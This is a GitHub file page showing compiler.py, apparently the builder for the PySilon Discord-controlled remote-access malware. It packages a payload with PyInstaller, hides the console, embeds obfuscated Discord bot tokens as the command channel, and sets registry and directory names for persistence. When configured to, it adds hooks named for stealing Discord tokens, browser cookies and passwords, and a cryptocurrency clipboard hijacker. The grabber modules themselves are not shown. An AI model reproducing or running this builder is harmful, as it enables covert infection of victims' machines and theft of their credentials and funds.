-
Notifications
You must be signed in to change notification settings - Fork 147
/
compiler.py
49 lines (42 loc) · 4.84 KB
/
compiler.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import configparser
import hashlib
import sys
import base64
import os
def get_file_hash(path):
sha256_hash = hashlib.sha256()
with open(path,"rb") as f:
for byte_block in iter(lambda: f.read(16777216),b""):
sha256_hash.update(byte_block)
return sha256_hash.hexdigest()
def compile(debug_mode):
config = configparser.ConfigParser()
if 'configuration.ini' in os.listdir('.'): config.read('configuration.ini')
else: input('Configuration file not found! Press ENTER to terminate...'); sys.exit(0)
if len(config['SETTINGS']) != 13 or len(config['FUNCTIONALITY']) != 27:
return 'Config corrupted'
compiling_command = 'start cmd /k "title Reorganising packages... & pip freeze > to_uninstall.txt & pip uninstall -y -r to_uninstall.txt > nul & del to_uninstall.txt > nul & pip install pillow > nul & pip install pyinstaller > nul & pip install -r custom_imports.txt > nul & pip uninstall -y numpy > nul & pip install numpy==1.26.4 > nul & pip uninstall -y scipy > nul & pip install scipy==1.13.0 > nul & title Compiling source code... & pyinstaller -F ' + ('--noconsole ' if not debug_mode else '') + '--upx-dir "resources/" ' + ('--add-data "resources/libopus-0.x64.dll;." ' if config['FUNCTIONALITY']['mc_live'] == 'True' else '') + '--runtime-hook=resources/misc.py ' + ('--runtime-hook=resources/protections.py ' if debug_mode else '') + ('--runtime-hook=resources/discord_token_grabber.py --runtime-hook=resources/get_cookies.py --runtime-hook=resources/passwords_grabber.py ' if config['FUNCTIONALITY']['grabber'] == 'True' else '') + ('--add-data="resources/crypto_clipper.json;." ' if config['FUNCTIONALITY']['crclipr'] == 'True' else '') + '--icon "' + (config['SETTINGS']['icon_path'] if config['SETTINGS']['custom_icon'] == 'True' else 'NONE' ) + '" "source_prepared.py" > nul & echo - & echo.Done & echo.- & start dist & del source_prepared.spec > nul & rmdir build /S /Q & pause & exit"'
token_1 = base64.b64encode(config['SETTINGS']['bot_token_1'].encode()).decode()[::-1]
token_2 = base64.b64encode(config['SETTINGS']['bot_token_2'].encode()).decode()[::-1] if config['SETTINGS']['bot_token_2'] != '' else None
token_3 = base64.b64encode(config['SETTINGS']['bot_token_3'].encode()).decode()[::-1] if config['SETTINGS']['bot_token_3'] != '' else None
with open('PySilon.key', 'wb') as save_key: save_key.write(os.urandom(1024*1024))
with open('source_assembled.py', 'r', encoding='utf-8') as copy_source_code: source_code = copy_source_code.readlines()
with open('source_prepared.py', 'w', encoding='utf-8') as edit_source_code:
for line_number, line in enumerate(source_code):
if line.startswith('bot_tokens'): edit_source_code.write(f"bot_tokens = {[token for token in [token_1, token_2, token_3] if token is not None]}\n")
elif line.startswith('software_registry_name'): edit_source_code.write('software_registry_name = \'' + config['SETTINGS']['registry_name'] + '\'\n')
elif line.startswith('software_directory_name'): edit_source_code.write('software_directory_name = \'' + config['SETTINGS']['directory_name'] + '\'\n')
elif line.startswith('software_executable_name'): edit_source_code.write('software_executable_name = \'' + config['SETTINGS']['executable_name'] + ('' if config['SETTINGS']['executable_name'].endswith('.exe') else '.exe') + '\'\n')
elif line.startswith(' \'info\':'): edit_source_code.write(' \'info\': True,\n')
elif line.startswith(' \'main\':'): edit_source_code.write(' \'main\': True,\n')
elif line.startswith(' \'spam\':'): edit_source_code.write(' \'spam\': ' + config['SETTINGS']['spam_channel'] + ',\n')
elif line.startswith(' \'file\':'): edit_source_code.write(' \'file\': ' + config['SETTINGS']['file-related_channel'] + ',\n')
elif line.startswith(' \'recordings\':'): edit_source_code.write(' \'recordings\': ' + config['SETTINGS']['recordings_channel'] + ',\n')
elif line.startswith(' \'voice\':'): edit_source_code.write(' \'voice\': ' + config['SETTINGS']['voice_channel'] + '\n')
elif line.startswith('secret_key'): edit_source_code.write('secret_key = \'' + get_file_hash('PySilon.key') + '\'\n')
elif line.startswith('guild_id'): edit_source_code.write('guild_id = ' + config['SETTINGS']['server_id']+ '\n')
elif line.lstrip().startswith('#.log ') and debug_mode:
edit_source_code.write(' '*(len(line)-len(line.lstrip())) + 'log(\'' + f'{line.lstrip()[:(-1 if line[-2]!="*" else -3)].replace("#.log ", "")}' + (' (' if line[-2]!='*' else '->') + f'source_assembled.py:{line_number})' + '\')\n')
elif line.startswith('#') or line.replace(' ', '') == '\n' or line.lstrip().startswith('#.log '): pass
else: edit_source_code.write(line)
os.system(compiling_command)